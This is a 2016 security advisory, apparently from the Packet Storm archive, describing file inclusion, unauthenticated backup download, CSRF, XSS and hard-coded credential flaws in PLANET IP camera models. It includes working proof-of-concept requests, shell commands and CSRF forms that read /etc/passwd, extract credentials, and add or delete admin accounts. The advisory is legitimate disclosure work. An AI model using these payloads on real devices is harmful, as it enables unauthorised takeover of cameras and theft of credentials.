exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PLANET IP LFI / CSRF / XSS / Authentication Bypass

PLANET IP LFI / CSRF / XSS / Authentication Bypass
Posted May 16, 2016
Authored by OrwellLabs | Site orwelllabs.com

Various PLANET IP cameras suffer from local file inclusion, arbitrary file read, information disclosure, cross site request forgery, cross site scripting, and hard-coded credential vulnerabilities.

tags | exploit, arbitrary, local, vulnerability, xss, bypass, file inclusion, info disclosure, csrf
SHA-256 | 32a7e102bd9444774357f4899f075de9a6081f7cccd69d5a1179bd263341ef93

PLANET IP LFI / CSRF / XSS / Authentication Bypass

Change Mirror Download
                         _ _ _       _
| | | | | |
___ _ ____ _____| | | | __ _| |__ ___
/ _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|
| (_) | | \ V V / __/ | | | (_| | |_) \__ \
\___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/

Security Adivisory
2016-04-06 www.orwelllabs.com
Twitter:@orwelllabs

mantra: ...not affect a product that is in scope for... AhHum!



Overview
========
Technical Risk: high
Likelihood of Exploitation: medium
Credits: Discovered and researched by Orwelllabs
CVE-Number: N/A
DWF: Submited
Adivisory URL: http://www.orwelllabs.com/2016/02/planet
-ip-surveillance-camera-local.html [1]


Issues
=====
I. Local File Inclusion (42 vectors)
II. Arbitrary file read/Authentication bypass
III. Sensitive information disclosure
IV. Cross-site request forgery
V. Reflected Cross-site scripting
VI. hardcoded credentials


I. Local File Inclusion
=======================
* CLASS: External Control of File Name or Path [CWE-73]

The Web Management interface of PLANET IP surveillance Cams models
FW-ICA-2500,
ICA-2250VT, ICA-4200V, ICA-4500V, ICA-3350V, ICA-5350V AND ICA-8350 and
probably
others is prone to Local File Include (LFI).


PoC
---
The request bellow is generated when a new user is added, in this case
we are adding the following administrative credential for the cam: "winst0n:
0rw3lll4bs".

GET /cgi-bin/admin/querylogin.cgi HTTP/1.1
Host: {xxx.xxx.xxx.xxx}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101
Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=winst0n&pwd=
0rw3lll4bs&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp
Cookie: ipcam_profile=1; tour_index=-1; IsHideStreamingStatus=yes
Authorization: Basic YdRRtXW41YXRtad4=
Connection: keep-alive
If-Modified-Since: Mon, 08 Jul 2013 11:10:26 GMT


If the value of the parameter "redirect" was changed to any system file
will return the contents of that file, as shown below:
http://{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=winst0n&pwd=
0rw3lll4bs&grp=administrator&sgrp=ptz&action=add&redirect=/etc/passwd

In this case will retrieved the content of /etc/passwd

Vectors:
-------
There are a total of 42 vectors of LFI, the detailed results will be
published in www.orwelllabs.com [1] soon.
Basically all menus of the camera (shown below) to submit, add, modify and
remove settings trigger the corresponding
scripts to access resource that contains a parameter "redirect" which is
also affected.

[ ----------------------------]
[ #1: Network ---------------] -> 9
[ #2: Camera ---------------] -> 3
[ #3: System -------------- ] -> 2
[ #4: Video -------------- ] -> 4
[ #5: Audio -------------- ] -> 1
[ #6: User -------------- ] -> 1
[ #7: Protocol ------------- ] -> 2
[ #8: E-Mail -------------- ] -> 1
[ #9: Event Detection ------ ] -> 1
[ #10: Storage -------------- ] -> 2
[ #11: Continuous Recording - ] -> 1
[ #12: Recording List ------- ] -> 0
[ #13: Event Server --------- ] -> 11
[ #14: Event Schedule ------- ] -> 4
[ ----------+--------------- ]



II. Arbitrary file read/Authentication bypass
=============================================
The camera offers a feature to perform the download settings via a backup
file. However,
(how acess control is not effective) this file remains accessible via the
browser for an unauthenticated user.

PoC
---
wget --no-check-certificate https://{xxx.xxx.xxx.xxx}/backup.tar.gz
tar -xzvf backup.tar.gz
cat tmp/sysConfig/sysenv.cfg|strings|fmt|cut -f8,9 -d" "

It will return the credential to access the camera

Through this vulnerability a user can also obtain the credential of the AP
to which the camera is connected just parsing
the file: 'tmp/sysConfig/extra.info'


III. Sensitive information disclosure
=====================================
Using LFI vulnerability report, a user can obtain sensitive information
such as username and password by reading the log file, as follows:

{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=&pwd=&grp=&sgrp=&action=&redirect=/var/log/messages


IV. Cross-site request forgery
==============================
Planet IP cams ICA-* are prone to Multple CSRF.

PoC
------

- This will create a admin credential: winst0n:0rw3lll4bs

<html>
<!-- Orwelllabs - PlanetIP -CSRF PoC - -->
<body>
<form action="http://{xxx.xxx.xxx.xxx}/setup.cgi?language=ie&adduser=winst0n
:0rw3lll4bs:1">
<input type="submit" value="Submit form" />
</form>
</body>
</html>

- ICA-5350V

<html>
<!-- Orwelllabs - PlanetIP -CSRF PoC - -->
<body>
<form action="http://{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=winst0n
&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp">
<input type="submit" value="Submit form" />
</form>
</body>
</html>

- Del user root

<html>
<!-- Orwelllabs - PlanetIP -CSRF PoC - -->
<body>
<form action="http://
{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=remove&redirect=asp%2Fuser.asp">
<input type="submit" value="Submit form" />
</form>
</body>
</html>


V. Cross-Site Scripting
=======================
Cams models ICA-* are prone to Multiple XSS

POC
-------
http://{xxx.xxx.xxx.xxx}/setup.cgi?<script>alert("XSS")</script>

this will pop-up the message XSS in the browser


VI. hardcoded credentials
=========================
The credentials of web management can be found just viewing the source of
page default_nets.htm:


PoC
------
https://{xxx.xxx.xxx.xxx}/default_nets.htm

code:

}

function av_onload(){
CheckMobileMode();
util_SetUserInfo();
Loadplay();
watchdog();
//alert("watchdog");
}
function Loadplay(){
play("MasterUsr","MasterPwd","554",parseInt("99"),parseInt("99"),"1",parseInt("2"),parseInt("0"),"192.168.1.99","");
}


Vulnerable Packages
===================
ICA-2500
ICA-2250VT
ICA-4200V
ICA-4500V
ICA-3350V
ICA-5350V
ICA-8350



Timeline
========
2015-10-02 - Issues discovered
2015-11-30 - Vendor contacted (advisore sent)
2015-12-16 - Vendor contacted (asking for feedback about reported issues)
2015-12-17 - Vendor response (asking for more time to check issues)
2015-12-21 - RD team replied: can't duplicate vulnerabilities....
2016-01-13 - Vendor contacted (submitted evidence that the vulnerabilities
persist and can be reproduced.)
...and no news after that...



Legal Notices
+++++++++++++
The information contained within this advisory and in any other published
by our lab is supplied "as-is" with no warranties or guarantees of fitness
of use or otherwise. I accept no responsibility for any damage caused by
the use or misuse of this information.


About Orwelllabs
++++++++++++++++
Orwelllabs is an independent security research lab interested in IoT, what
means embedded devices and all its components like web applications, network,
mobile applications and all surface areas prone to attack. Orwelllabs aims
to study, learn and produce some intelligence around this vast and
confusing big picture called smart cities. We have special appreciation for
devices designed to provide security to these highly technological cities,
also known as IoST.



-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
=IZYl
-----END PGP PUBLIC KEY BLOCK-----
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    34 Files
  • 28
    Feb 28th
    27 Files
  • 29
    Feb 29th
    8 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close